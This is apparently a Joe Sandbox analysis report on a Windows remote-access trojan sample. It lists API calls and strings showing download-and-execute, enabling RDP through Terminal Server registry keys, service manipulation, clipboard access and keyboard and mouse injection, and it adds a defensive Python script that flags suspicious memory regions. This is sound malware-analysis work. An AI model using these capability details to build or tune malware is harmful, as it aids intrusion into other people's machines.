                        • Source File: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AllocExitProcessVirtual
                        • String ID:
                        • API String ID: 3766876677-0
                        APIs
                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00401D80,00000000), ref: 00403215
                          • Part of subcall function 004030BC: GetVersionExA.KERNEL32 ref: 004030DB
                        • HeapDestroy.KERNEL32 ref: 00403254
                          • Part of subcall function 00401E60: HeapAlloc.KERNEL32(00000000,00000140,0040323D,000003F8), ref: 00401E6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Heap$AllocCreateDestroyVersion
                        • String ID:
                        • API String ID: 2507506473-0
                        APIs
                        • RegCloseKey.ADVAPI32(?,1000E087,75BF8400,74DE8A60,00000000,?,00000000,00000001,?), ref: 1000E0A5
                        • RegCloseKey.ADVAPI32(?), ref: 1000E0AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02080626
                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02080659
                        Memory Dump Source
                        • Source File: 00000000.00000003.1636444427.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_3_2080000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        APIs
                        • VirtualAlloc.KERNEL32(0040166A,?,00001000,00000004,00000000,0040166A,E9C11475,00000000,0040166A), ref: 00401173
                        • VirtualAlloc.KERNEL32(0040166A,?,00001000,00000004,00000000,0040166A,E9C11475,00000000,0040166A), ref: 00401194
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        APIs
                        • 6E341E00.AVICAP32(00000000,?,00000064,?,00000032,?), ref: 100012BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: E341
                        • String ID:
                        • API String ID: 1096277783-0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Similarity
                        • API ID: calloc
                        • String ID:
                        • API String ID: 2635317215-0
                        APIs
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 100109A1
                        • OutputDebugStringA.KERNEL32(OpenSCManager Error), ref: 100109B6
                        • LocalAlloc.KERNEL32(00000040,00010000), ref: 100109C9
                        • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,00010000,?,?,?), ref: 100109E7
                        • LocalAlloc.KERNEL32(00000040,00000104), ref: 100109F4
                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010A3F
                        • LocalAlloc.KERNEL32(00000040,00001000), ref: 10010A52
                        • QueryServiceConfigA.ADVAPI32(00000000,00000000,00001000,?), ref: 10010A66
                        • lstrcat.KERNEL32(00000000,1007B97C), ref: 10010AAB
                        • lstrcat.KERNEL32(?,1007B974), ref: 10010ACE
                        • lstrcat.KERNEL32(?,1007B96C), ref: 10010AF1
                        • lstrcat.KERNEL32(?,1007B964), ref: 10010B14
                        • wsprintfA.USER32 ref: 10010B31
                        • wsprintfA.USER32 ref: 10010B5F
                          • Part of subcall function 1000E6B0: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,10010B75,00000000,10010B75,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E6C8
                          • Part of subcall function 1000E7C0: RegQueryValueExA.ADVAPI32(?,10010B8B,00000000,10010B8B,?), ref: 1000E7E3
                        • wsprintfA.USER32 ref: 10010BA0
                        • lstrlen.KERNEL32(?), ref: 10010BA9
                        • lstrlen.KERNEL32(?), ref: 10010BB5
                        • lstrlen.KERNEL32(?), ref: 10010BC1
                        • lstrlen.KERNEL32(?), ref: 10010BCA
                        • lstrlen.KERNEL32(?), ref: 10010BD6
                        • lstrlen.KERNEL32 ref: 10010BDD
                        • lstrlen.KERNEL32(?), ref: 10010BE5
                        • LocalSize.KERNEL32(?), ref: 10010BF7
                        • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10010C05
                        • lstrlen.KERNEL32(?), ref: 10010C13
                        • lstrlen.KERNEL32(?), ref: 10010C38
                        • lstrlen.KERNEL32(00000000), ref: 10010C49
                        • lstrlen.KERNEL32(00000001), ref: 10010C67
                        • lstrlen.KERNEL32(?), ref: 10010C7D
                        • lstrlen.KERNEL32(?), ref: 10010C9E
                        • lstrlen.KERNEL32(?), ref: 10010CB4
                        • lstrlen.KERNEL32(?), ref: 10010CDC
                        • lstrlen.KERNEL32(?), ref: 10010CEF
                        • lstrlen.KERNEL32(?), ref: 10010D11
                        • lstrlen.KERNEL32(?), ref: 10010D27
                        • lstrlen.KERNEL32(?), ref: 10010D4F
                        • lstrlen.KERNEL32(?), ref: 10010D65
                        • lstrlen.KERNEL32(?), ref: 10010D8D
                        • CloseServiceHandle.ADVAPI32(?), ref: 10010DA0
                        • LocalFree.KERNEL32(?), ref: 10010DAB
                          • Part of subcall function 1000E650: RegCloseKey.ADVAPI32(?,?,10010DC5), ref: 1000E6FB
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 10010DE6
                        • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 10010DF4
                        Strings
                        Similarity
                        • API ID: lstrlen$Local$Alloc$Servicelstrcat$CloseOpenwsprintf$HandleQuery$ConfigDebugEnumFreeManagerOutputServicesSizeStatusStringValue
                        • String ID: Description$OpenSCManager Error$SYSTEM\CurrentControlSet\Services\%s
                        • API String ID: 1351573288-819907790
                        APIs
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010E82
                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010E97
                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10010EB9
                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 10010EDA
                        • Sleep.KERNEL32(00000320), ref: 10010EED
                        • DeleteService.ADVAPI32(00000000), ref: 10010EF4
                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 10010F5B
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010FAC
                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10010FC3
                        • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 10010FD8
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 10010FDF
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10010FF1
                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10011008
                        • LockServiceDatabase.ADVAPI32(00000000), ref: 10011019
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 1001103E
                        • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 10011055
                        • LockServiceDatabase.ADVAPI32(00000000), ref: 10011066
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 1001108B
                        • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 100110A2
                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 100110B8
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 100110BF
                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,00000000), ref: 100110CE
                        • OpenServiceA.ADVAPI32(00000000,00000000,000F01FF), ref: 100110E1
                        • LockServiceDatabase.ADVAPI32(00000000), ref: 100110EE
                        • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001110B
                        • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10011112
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 10011119
                        • CloseServiceHandle.ADVAPI32(00000000), ref: 10011120
                        • Sleep.KERNEL32(000001F4), ref: 1001112B
                        Strings
                        • SYSTEM\CurrentControlSet\Services\, xrefs: 10010F00
                        Similarity
                        • API ID: Service$Open$Manager$CloseDatabaseHandle$Lock$ControlDeleteSleep$ChangeConfigQueryStartStatusUnlock
                        • String ID: SYSTEM\CurrentControlSet\Services\
                        • API String ID: 1632965242-3886778518
                        APIs
                        • _strrev.MSVCRT ref: 1000B2E0
                        • _strrev.MSVCRT ref: 1000B2FF
                        • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,PortNumber), ref: 1000B3DA
                          • Part of subcall function 10012110: GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                          • Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • ExitWindowsEx.USER32(00000002,00000000), ref: 1000B406
                          • Part of subcall function 10012110: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10012157
                          • Part of subcall function 10012110: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001216F
                          • Part of subcall function 10012110: GetLastError.KERNEL32 ref: 10012175
                          • Part of subcall function 10012110: CloseHandle.KERNEL32(?), ref: 10012186
                        Strings
                        Similarity
                        • API ID: ProcessToken_strrev$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueVersionWindows
                        • String ID: .DEFAULT\Keyboard Layout\Toggle$EnableAdminTSRemote$Enabled$Hotkey$PortNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$SOFTWARE\Microsoft\Windows\CurrentVersion\netcache$SOFTWARE\Policies\Microsoft\Windows\Installer$SYSTEM\CurrentControlSet\Control\Terminal Server$SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp$SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp$SYSTEM\CurrentControlSet\Services\TermDD$SYSTEM\CurrentControlSet\Services\TermService$SeShutdownPrivilege$ShutdownWithoutLogon$Start$delbanEST$fDenyTSConnections$tratS
                        • API String ID: 2558968919-3505973513
                        APIs
                        • Sleep.KERNEL32(000007D0), ref: 1000B88F
                        • GetTickCount.KERNEL32 ref: 1000B8E3
                        • wsprintfA.USER32 ref: 1000B8F8
                        • URLDownloadToFileA.URLMON(00000000,?,C:\,00000000,00000000), ref: 1000B910
                        • GetTempPathA.KERNEL32(00000104,?,00000000,?,C:\,00000000,00000000), ref: 1000B924
                        • fopen.MSVCRT ref: 1000B934
                        • fscanf.MSVCRT ref: 1000B95B
                        • GetTickCount.KERNEL32 ref: 1000B969
                        • wsprintfA.USER32 ref: 1000B981
                        • GetTickCount.KERNEL32 ref: 1000B986
                        • wsprintfA.USER32 ref: 1000B99E
                        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 1000B9B9
                        • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 1000B9D3
                        • fscanf.MSVCRT ref: 1000B9E7
                        • fclose.MSVCRT ref: 1000B9F6
                        • DeleteFileA.KERNEL32(C:\), ref: 1000BA04
                        • Sleep.KERNEL32(?), ref: 1000BA4A
                        Strings
                        Similarity
                        • API ID: CountFileTickwsprintf$DownloadSleepfscanf$DeleteExecutePathShellTempfclosefopen
                        • String ID: %s$%s%d.exe$%s?abc=%d$C:\$open
                        • API String ID: 2342319182-3740277425
                        APIs
                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 10007240
                        Strings
                        Similarity
                        • API ID: AccountLookupName
                        • String ID: .$2$3$ConvertSidToStringSidA$L$_RasDefaultCredentials#0$i$p$v
                        • API String ID: 1484870144-2807325862
                        APIs
                        • lstrlen.KERNEL32(?,?,?,?), ref: 10008D1A
                        • wsprintfA.USER32 ref: 10008D53
                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 10008D65
                        • wsprintfA.USER32 ref: 10008DA4
                        • wsprintfA.USER32 ref: 10008DC7
                        • ??2@YAPAXI@Z.MSVCRT(00000018,?,00000001,?,?,?,?,?,?,?,?,?), ref: 10008E3D
                        • ??3@YAXPAX@Z.MSVCRT(0000005C), ref: 10008EA6
                        • FindNextFileA.KERNEL32(?,?), ref: 10008ED5
                        • FindClose.KERNEL32(?), ref: 10008EE8
                        Strings
                        Similarity
                        • API ID: Findwsprintf$File$??2@??3@CloseFirstNextlstrlen
                        • String ID: %s%s%s$%s%s*.*$.
                        • API String ID: 862180513-1343461528
                        APIs
                        Strings
                        Similarity
                        • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                        • String ID: %s\%s$%s\*.*$.
                        • API String ID: 2470771279-1471744235
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000000,Applications\iexplore.exe\shell\open\command,00000000,000F003F,?), ref: 1000A88A
                        • RegQueryValueA.ADVAPI32(?,00000000,?,00000104), ref: 1000A8A8
                        • RegCloseKey.ADVAPI32(?), ref: 1000A8B3
                        • Sleep.KERNEL32(00000001), ref: 1000A8BB
                        • lstrlen.KERNEL32(?), ref: 1000A8C6
                        • strstr.MSVCRT ref: 1000A8DA
                        • lstrcpy.KERNEL32(00000000,?), ref: 1000A8E9
                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1000A93E
                        Strings
                        Similarity
                        • API ID: CloseCreateOpenProcessQuerySleepValuelstrcpylstrlenstrstr
                        • String ID: Applications\iexplore.exe\shell\open\command$D
                        • API String ID: 454182167-535818822
                        Strings
                        • *** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004CE0A
                        • *** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004CC18
                        • *** PFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004CB54, 1004D134
                        • PVOP, xrefs: 1004CB78
                        • CLOSED GOP BVOP->PVOP, xrefs: 1004CAD5
                        • *** XXXXXX bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004C9B0
                        • %d st:%lld if:%d, xrefs: 1004C7E4
                        • *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004CD4E
                        • *** END, xrefs: 1004D187
                        • *** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004D02C
                        • *** BFRAME (store) bf: head=%i tail=%i queue: head=%i tail=%i size=%i quant=%i, xrefs: 1004C932
                        • IVOP, xrefs: 1004CC3C
                        • BVOP, xrefs: 1004C81A
                        Similarity
                        • API ID: vsprintf
                        • String ID: %d st:%lld if:%d$*** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** BFRAME (store) bf: head=%i tail=%i queue: head=%i tail=%i size=%i quant=%i$*** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** END$*** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** PFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** XXXXXX bf: head=%i tail=%i queue: head=%i tail=%i size=%i$BVOP$CLOSED GOP BVOP->PVOP$IVOP$PVOP
                        • API String ID: 2974291354-2148658119
                        APIs
                        • GetLogicalDriveStringsA.KERNEL32 ref: 10008511
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 10008567
                        • SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 10008585
                        • lstrlen.KERNEL32(?), ref: 10008599
                        • lstrlen.KERNEL32(?), ref: 100085A7
                        • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 100085C6
                        • GetDriveTypeA.KERNEL32(?), ref: 1000860D
                        • lstrlen.KERNEL32(?), ref: 10008677
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Drive$DiskFileFreeInfoInformationLogicalSpaceStringsTypeVolume
                        • String ID: g
                        • API String ID: 2496086942-30677878
                        • Opcode ID: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                        • Instruction ID: bd1b9881f0be87f73bf4931a3af0dd25f56242c05abfce1c01fbda5312f2509a
                        • Opcode Fuzzy Hash: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                        • Instruction Fuzzy Hash: AF41D6705083859FD715CF14C840AAFB7EAFFC8344F04492DF98997251D7B0AA49CBA2
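Every function record in this part of the report is attributed to the same set of memory dumps, and the numeric fields in those descriptor names carry the page protection, allocation state and allocation type of each region. The Python below is an added example and not part of the Joe Sandbox report: it decodes the descriptors listed above and flags the regions an analyst should open first. The field layout it assumes (process index, dump stage, dump id, base address, protection, state, type, trailing field) is inferred from the values on this page rather than taken from a documented Joe Sandbox naming convention; the constant names are Windows' own MEMORY_BASIC_INFORMATION values from winnt.h.

```python
"""Decode the memory-dump descriptors a Joe Sandbox function record is attributed to."""
import re

# Constructed sample: the descriptors listed under "Memory Dump Source" above.
SAMPLE_DUMPS = [
    "00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp",
    "00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp",
    "00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp",
]

# Windows MEMORY_BASIC_INFORMATION constants (winnt.h); these are not assumptions.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed field layout, inferred from the values on the page:
# proc.stage.dumpid.base.protect.state.type.reserved.sdmp
DUMP_NAME = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<reserved>[0-9A-F]{8})\.sdmp$", re.IGNORECASE)


def parse_dump_name(name):
    """Decode one descriptor into base address and symbolic protection/state/type."""
    m = DUMP_NAME.match(name)
    if not m:
        raise ValueError(f"not a dump descriptor: {name}")
    protect = int(m.group("protect"), 16)
    return {
        "process_index": int(m.group("proc"), 16),
        "base": int(m.group("base"), 16),
        # low byte is the access class; 0x100 would be the PAGE_GUARD modifier
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "guard": bool(protect & 0x100),
        "state": MEM_STATE.get(int(m.group("state"), 16), m.group("state")),
        "type": MEM_TYPE.get(int(m.group("type"), 16), m.group("type")),
    }


def suspicious_regions(names):
    """Regions to open first: writable and executable, or executable without an image backing."""
    flagged = []
    for name in names:
        r = parse_dump_name(name)
        reasons = []
        if r["protect"] == "PAGE_EXECUTE_READWRITE":
            reasons.append("RWX")
        if r["protect"].startswith("PAGE_EXECUTE") and r["type"] != "MEM_IMAGE":
            reasons.append("executable but not a file-backed image")
        if reasons:
            flagged.append((r["base"], r["protect"], r["type"], reasons))
    return flagged


if __name__ == "__main__":
    for base, protect, kind, reasons in suspicious_regions(SAMPLE_DUMPS):
        print(f"{base:#010x} {protect:24s} {kind:12s} {'; '.join(reasons)}")
```

Under that layout every region on this page decodes as MEM_COMMIT and MEM_PRIVATE, so the code at 0x10001000 executes from private memory rather than from a file-backed image mapping, which is what one typically sees when a PE is placed in memory by the sample itself instead of by the Windows loader, and the region at 0x100FA000 is additionally PAGE_EXECUTE_READWRITE. Those two regions are the ones the script flags.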
                        APIs
                          • Part of subcall function 10012B10: GetCurrentThreadId.KERNEL32 ref: 10012B22
                          • Part of subcall function 10012B10: GetThreadDesktop.USER32(00000000), ref: 10012B29
                          • Part of subcall function 10012B10: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 10012B56
                          • Part of subcall function 10012B10: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10012B61
                          • Part of subcall function 10012B10: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 10012B8E
                          • Part of subcall function 10012B10: lstrcmpiA.KERNEL32(?,?), ref: 10012B9D
                          • Part of subcall function 10012B10: SetThreadDesktop.USER32(00000000), ref: 10012BA8
                          • Part of subcall function 10012B10: CloseDesktop.USER32(00000000), ref: 10012BC0
                          • Part of subcall function 10012B10: CloseDesktop.USER32(00000000), ref: 10012BC3
                        • SetCursorPos.USER32(?,?,?,?,?,?,1000F5FF,?,?,00000000), ref: 1000FA38
                        • WindowFromPoint.USER32(?,?,?,?,?,?,1000F5FF,?,?,00000000), ref: 1000FA40
                        • SetCapture.USER32(00000000,?,?,?,?,1000F5FF,?,?,00000000), ref: 1000FA47
                        • MapVirtualKeyA.USER32(?,00000000), ref: 1000FA86
                        • keybd_event.USER32(?,00000000), ref: 1000FA90
                        • MapVirtualKeyA.USER32(?,00000000), ref: 1000FAA4
                        • keybd_event.USER32(00000000,00000000), ref: 1000FAAE
                        • mouse_event.USER32(00000008,00000000,00000000,00000000,00000000), ref: 1000FB6A
                        Yara matches
                        Similarity
                        • API ID: Desktop$Thread$CloseInformationObjectUserVirtualkeybd_event$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpimouse_event
                        • String ID:
                        • API String ID: 1258999209-0
                        • Opcode ID: 6ee3277e865b55dc97bfe5344af86ba04143f10aa31d970df9b3cb410169750c
                        • Instruction ID: f5d10c0a343a29c8425a531d233686d834a6ea72a830d3e4a23e197e1be1dea8
                        • Opcode Fuzzy Hash: 6ee3277e865b55dc97bfe5344af86ba04143f10aa31d970df9b3cb410169750c
                        • Instruction Fuzzy Hash: C2419D71BC0321B6F630CA148C9BF2A7659E785F81F304119F701FE9C9C6E4B900AA5D
                        APIs
                        • OpenClipboard.USER32(00000000), ref: 1000FC2A
                        • GetClipboardData.USER32(00000001), ref: 1000FC36
                        • CloseClipboard.USER32 ref: 1000FC46
                        • GlobalSize.KERNEL32(00000000), ref: 1000FC55
                        • GlobalLock.KERNEL32(00000000), ref: 1000FC5F
                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 1000FC68
                        • GlobalUnlock.KERNEL32(?), ref: 1000FC8F
                        • CloseClipboard.USER32 ref: 1000FC95
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000001), ref: 1000FCA7
                        Yara matches
                        Similarity
                        • API ID: Clipboard$Global$Close$??2@??3@DataLockOpenSizeUnlock
                        • String ID:
                        • API String ID: 3218637236-0
                        • Opcode ID: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                        • Instruction ID: b2ebfa32c9fb2684969518ebc31350a2b2d993565be8939cec1bf41d42c3659a
                        • Opcode Fuzzy Hash: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                        • Instruction Fuzzy Hash: E60126355003645FE700EB349C8AAAB379AFF45741F44452CFD0686200EBB5AC08C6B2
                        APIs
                        • OpenClipboard.USER32(00000000), ref: 1000FBB2
                        • EmptyClipboard.USER32 ref: 1000FBBE
                        • GlobalAlloc.KERNEL32(00002000,?,?,?,?,?), ref: 1000FBCE
                        • GlobalLock.KERNEL32(00000000), ref: 1000FBDC
                        • GlobalUnlock.KERNEL32(00000000), ref: 1000FBF9
                        • SetClipboardData.USER32(00000001,00000000), ref: 1000FC02
                        • GlobalFree.KERNEL32(00000000), ref: 1000FC09
                        • CloseClipboard.USER32 ref: 1000FC10
                        Yara matches
                        Similarity
                        • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                        • String ID:
                        • API String ID: 453615576-0
                        • Opcode ID: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                        • Instruction ID: 1752c5a271f595f9706e0c601d6f08a1c3e9b8b4fbe7c48789eb342d89222aed
                        • Opcode Fuzzy Hash: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                        • Instruction Fuzzy Hash: A7F01D722003A59FF704AB709DCDA6B3A9AFB49752F040428FA02D6291CFA08C45D661
                        APIs
                        • Sleep.KERNEL32(0000000A), ref: 1000F91C
                        • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1000F937
                        • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1000F94A
                        • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 1000F966
                        • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1000F979
                          • Part of subcall function 1000F3F0: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F413
                          • Part of subcall function 1000F3F0: CloseHandle.KERNEL32(?,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F41D
                          • Part of subcall function 1000F3F0: ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F441
                        • BlockInput.USER32(?), ref: 1000F988
                          • Part of subcall function 1000FCC0: GetSystemMetrics.USER32(00000000), ref: 1000FCD7
                          • Part of subcall function 1000FCC0: GetSystemMetrics.USER32(00000001), ref: 1000FCE0
                        • BlockInput.USER32(00000000), ref: 1000F9BB
                        Yara matches
                        Similarity
                        • API ID: System$BlockInfoInputMessageMetricsParametersSend$??2@CloseHandleObjectSingleSleepWait
                        • String ID:
                        • API String ID: 1415795360-0
                        • Opcode ID: b34e5be86bb1df2f76dee073435c2ecf2f90dbbcc898db3eb2e9e0cd148aa2ae
                        • Instruction ID: 303fd76c0112ef43c9a7933eae0aa9ba37b9407a239ada42a8401ebc6e2605ad
                        • Opcode Fuzzy Hash: b34e5be86bb1df2f76dee073435c2ecf2f90dbbcc898db3eb2e9e0cd148aa2ae
                        • Instruction Fuzzy Hash: F921F33434038132FA04EB384C87BB967878F46BD4F50053DBA926FAC7CDA5A849A255
                        APIs
